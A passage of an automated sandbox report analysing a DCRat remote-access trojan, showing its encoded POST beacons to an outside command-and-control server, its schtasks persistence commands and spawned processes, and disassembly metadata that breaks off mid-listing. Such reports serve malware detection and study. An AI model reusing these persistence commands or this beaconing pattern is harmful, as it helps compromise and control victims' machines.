                  Data Raw: 02 1a 27 1c 37 43 33 0e 29 05 2c 1b 25 28 2d 0d 28 21 26 5c 38 2d 31 5e 29 2d 2a 05 2e 06 28 01 35 02 35 5a 3d 3e 28 04 27 36 05 1f 21 1b 2d 5d 02 1a 23 05 21 1c 2a 0c 30 0d 37 5c 2d 55 32 0a 29 30 2a 5a 27 5d 2d 08 26 2b 24 0a 23 33 29 51 32 21 39 51 3a 1a 28 00 2c 09 3f 0c 27 2a 23 5f 03 14 3a 0a 21 3d 2b 05 31 08 3d 05 22 2b 39 1f 35 1a 22 0c 29 16 0d 59 3c 02 3e 5d 33 08 3b 05 24 04 32 54 3e 00 39 0b 21 3f 33 05 3e 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '7C3),%(-(!&\8-1^)-*.(55Z=>('6!-]#!*07\-U2)0*Z']-&+$#3)Q2!9Q:(,?'*#_:!=+1="+95")Y<>]3;$2T>9!?3># P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.549964185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:54.433871984 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1044
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:54.787272930 CET1044OUTData Raw: 51 56 58 5d 5d 44 5a 50 54 58 56 53 59 5c 58 54 55 51 5c 5f 51 5b 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QVX]]DZPTXVSY\XTUQ\_Q[SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F<+^51'\',>69;);=&]473-T9( \#<(9[".Z/"
                  Dec 27, 2024 04:03:55.810590029 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:56.054394960 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:55 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.549968185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:56.299829006 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:56.646703005 CET1048OUTData Raw: 51 56 5d 5f 58 45 5f 51 54 58 56 53 59 5b 58 50 55 57 5c 5a 51 5b 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QV]_XE_QTXVSY[XPUW\ZQ[SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'<<9>>[!?]%."_7**^1#] "-8(\6??(9[".Z/
                  Dec 27, 2024 04:03:57.682112932 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:57.961121082 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:57 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.549971185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:58.198730946 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:58.552824974 CET1048OUTData Raw: 54 56 5d 5d 5d 42 5a 54 54 58 56 53 59 58 58 54 55 55 5c 5d 51 58 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TV]]]BZTTXVSYXXTUU\]QXSRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A+<-<!'Y1Y5^"94P+;5&($#3!T.;$[!<(+:9[".Z/6
                  Dec 27, 2024 04:03:59.577157974 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:59.856327057 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:59 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:22:01:53
                  Start date:26/12/2024
                  Path:C:\Users\user\Desktop\ArELGBzuuF.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\ArELGBzuuF.exe"
                  Imagebase:0x580000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.2021098488.0000000000582000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:22:01:53
                  Start date:26/12/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f
                  Imagebase:0x7ff6c6370000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:22:01:53
                  Start date:26/12/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "staticfile" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff6c6370000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:22:01:53
                  Start date:26/12/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff6c6370000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:22:01:54
                  Start date:26/12/2024
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"
                  Imagebase:0x7ff7a56b0000
                  File size:2'759'232 bytes
                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:6
                  Start time:22:01:54
                  Start date:26/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:22:01:54
                  Start date:26/12/2024
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB12E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP"
                  Imagebase:0x7ff623190000
                  File size:52'744 bytes
                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:22:01:54
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\staticfile.exe
                  Imagebase:0xe60000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\staticfile.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 79%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:9
                  Start time:22:01:54
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\AppData\Local\staticfile.exe
                  Imagebase:0xe30000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:10
                  Start time:22:01:55
                  Start date:26/12/2024
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"
                  Imagebase:0x7ff7a56b0000
                  File size:2'759'232 bytes
                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:11
                  Start time:22:01:55
                  Start date:26/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:22:01:55
                  Start date:26/12/2024
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP"
                  Imagebase:0x7ff623190000
                  File size:52'744 bytes
                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:13
                  Start time:22:01:56
                  Start date:26/12/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat"
                  Imagebase:0x7ff70bec0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:14
                  Start time:22:01:56
                  Start date:26/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:15
                  Start time:22:01:56
                  Start date:26/12/2024
                  Path:C:\Windows\System32\chcp.com
                  Wow64 process (32bit):false
                  Commandline:chcp 65001
                  Imagebase:0x7ff66ad90000
                  File size:14'848 bytes
                  MD5 hash:33395C4732A49065EA72590B14B64F32
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:16
                  Start time:22:01:56
                  Start date:26/12/2024
                  Path:C:\Windows\System32\w32tm.exe
                  Wow64 process (32bit):false
                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  Imagebase:0x7ff6fe110000
                  File size:108'032 bytes
                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:17
                  Start time:22:02:01
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                  Imagebase:0x410000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:18
                  Start time:22:02:06
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                  Imagebase:0x7c0000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:20
                  Start time:22:02:14
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                  Imagebase:0x820000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:21
                  Start time:22:02:27
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                  Imagebase:0xed0000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:22
                  Start time:22:02:36
                  Start date:26/12/2024
                  Path:C:\Users\user\AppData\Local\staticfile.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\staticfile.exe"
                  Imagebase:0x7c0000
                  File size:539'136 bytes
                  MD5 hash:C410E5BDD0E37AB9D6B8EFC9B1B26B71
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FF848F11EC3 Relevance: 15.2, Strings: 11, Instructions: 1498COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$[$[$\$]$]$u${${$}$}
                    • API String ID: 0-3490533229
                    • Opcode ID: b7f636ee624db1bb1a28e99d4d252665c5b6a306aa6b4385fd0aaa5934caec2d
                    • Instruction ID: 2ed8562909efa58e2721bdbced2043598c6e8a295a74ff10828ea658e65571c8
                    • Opcode Fuzzy Hash: b7f636ee624db1bb1a28e99d4d252665c5b6a306aa6b4385fd0aaa5934caec2d
                    • Instruction Fuzzy Hash: 4ED2B170D196298FDBA8EF28C8947A9B7B1FF58341F5041EAD00DA3291DB35AE81CF54
                    Function 00007FF848F2AFA2 Relevance: .5, Instructions: 459COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e01f1de628fc14871ba6ff63b96e60967d8cd918aab3723f4fd97892d6e20d31
                    • Instruction ID: fc6b3ee4d6c9bd284b0c553edc11b2e25550c27555bc0dbb08811fceb3773e4b
                    • Opcode Fuzzy Hash: e01f1de628fc14871ba6ff63b96e60967d8cd918aab3723f4fd97892d6e20d31
                    • Instruction Fuzzy Hash: E9E1C23091CA8E8FEBA9EF28D8557E977E1FB54350F04426ED84DC7291CF79A8448B81
                    Function 00007FF848F2D785 Relevance: .2, Instructions: 192COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efd6f2811c40809c7e42f78d998bbfa3e06f7297296c8c0a2e20bffe5e437478
                    • Instruction ID: c198b5af26b793a29cdc5a0737c39c65d2fc9d084687b7fdb8d5e149c68061cb
                    • Opcode Fuzzy Hash: efd6f2811c40809c7e42f78d998bbfa3e06f7297296c8c0a2e20bffe5e437478
                    • Instruction Fuzzy Hash: 1161F070D0961D8FDB58EFA8E8946EDBBB1FF59301F20047ED409A7291CB39A981CB44
                    Function 00007FF848F23660 Relevance: .1, Instructions: 52COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62ed56f4672b04f5c98a25d596fcbc7f93344453eb3407e9a17640963abf7c1b
                    • Instruction ID: 478bf1220d43043ee60f1236c53b6a1913306468d2d6ed1faa1b226b9ee75548
                    • Opcode Fuzzy Hash: 62ed56f4672b04f5c98a25d596fcbc7f93344453eb3407e9a17640963abf7c1b
                    • Instruction Fuzzy Hash: C0110330D0882E8FDBA4EB58C880BECB7B0EB48344F5040B9C04DE3291DE39A9958B04
                    Function 00007FF848F1D6D2 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: LY_H
                    • API String ID: 0-3603932575
                    • Opcode ID: c33a73dc18f7b5d7db00cdf6c7a09b9120715f14574ef9f99304f0ebad2bbca8
                    • Instruction ID: 85dcd2bee0fb07e4548a1e9ea7d3914efc844fc868dcded12a2a779f7447ac9b
                    • Opcode Fuzzy Hash: c33a73dc18f7b5d7db00cdf6c7a09b9120715f14574ef9f99304f0ebad2bbca8
                    • Instruction Fuzzy Hash: 0AD1C431A0C94A8FE7A8FB18C8456B437E1FF99351F5402B9E44EC76D2DF28AC468745
                    Function 00007FF848F26372 Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: L
                    • API String ID: 0-2909332022
                    • Opcode ID: 557d2bf1b267013215752ce45bf5225df9f8ec68e75f8f27783d44c0a2189eb2
                    • Instruction ID: 028c585069566c4da323aafe9185d6ccaed41b0231445ca9872e0b86e2382cc5
                    • Opcode Fuzzy Hash: 557d2bf1b267013215752ce45bf5225df9f8ec68e75f8f27783d44c0a2189eb2
                    • Instruction Fuzzy Hash: 6FC12E3071D8158FEB48AB6CD459E6673E1EF68741F2541A9E00EC72E2DE2CEC41CB95
                    Function 00007FF848F1124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 162f75f92aa90f0e8f77c67140c124c8aebf2fc39e1f7dde55cfd96dba5a8e93
                    • Instruction ID: 91463032669bed8e44540c8f5c1449f027028463ba14138258242ca34020d177
                    • Opcode Fuzzy Hash: 162f75f92aa90f0e8f77c67140c124c8aebf2fc39e1f7dde55cfd96dba5a8e93
                    • Instruction Fuzzy Hash: C2A17374A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AC81CB00
                    Function 00007FF848F203B8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 217b0991df94867b831707505e063fdd040a2ded96b6eaeeb91732f0941fc7c3
                    • Instruction ID: 87f0bf8baad6f6972c8bbb9130c3a1d5f6c79440a31d9ad693d18ecd51c1fe87
                    • Opcode Fuzzy Hash: 217b0991df94867b831707505e063fdd040a2ded96b6eaeeb91732f0941fc7c3
                    • Instruction Fuzzy Hash: 72515B32E0D54A9FDB49EB98E4515BDBBB1FF89340F1041BAC40AE72C6CB392905CB55
                    Function 00007FF848F1D689 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: K`
                    • API String ID: 0-3121505034
                    • Opcode ID: fc257a0f56851fc8ed613d082d8bdd91478ed98a4e473585ab3f8d2929513d1e
                    • Instruction ID: ff599ea702a4c9de8edf57a6be518f165647246bbdd61762ab1da3aea82d6406
                    • Opcode Fuzzy Hash: fc257a0f56851fc8ed613d082d8bdd91478ed98a4e473585ab3f8d2929513d1e
                    • Instruction Fuzzy Hash: DB31B032E0D58A9EF229F72858511B97AB0EF423A0F1801BAD44B871C2DF4C3C41939A
                    Function 00007FF848F1BB88 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: K`
                    • API String ID: 0-3121505034
                    • Opcode ID: 34e6ea29fb9b6b608a9c280e21da4846d819aec27e855598c260aa8581cd5f09
                    • Instruction ID: 3daeaa327397da8904dce2b805624eb82a65b549d5dadbba8df840f9ebcfa539
                    • Opcode Fuzzy Hash: 34e6ea29fb9b6b608a9c280e21da4846d819aec27e855598c260aa8581cd5f09
                    • Instruction Fuzzy Hash: B7310430D1C80ADEEBA8FF94A4515BE76B5FF44380F5000BAD40ED21C1EB3A79809A89
                    Function 00007FF848F1DA92 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: K`
                    • API String ID: 0-3121505034
                    • Opcode ID: e15c46e7d47dad2948efe3037b1ede788f5983bce7e9aeb127913125e52ddce0
                    • Instruction ID: f88fc160504acfcc15b49914c6464c523d1d608151132770ec29b0353f54686d
                    • Opcode Fuzzy Hash: e15c46e7d47dad2948efe3037b1ede788f5983bce7e9aeb127913125e52ddce0
                    • Instruction Fuzzy Hash: D5214131E4E2C65EE36AF73858611B97E705F42390F1901FAD48A8A0D3CF4C2D45935A
                    Function 00007FF848F109D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
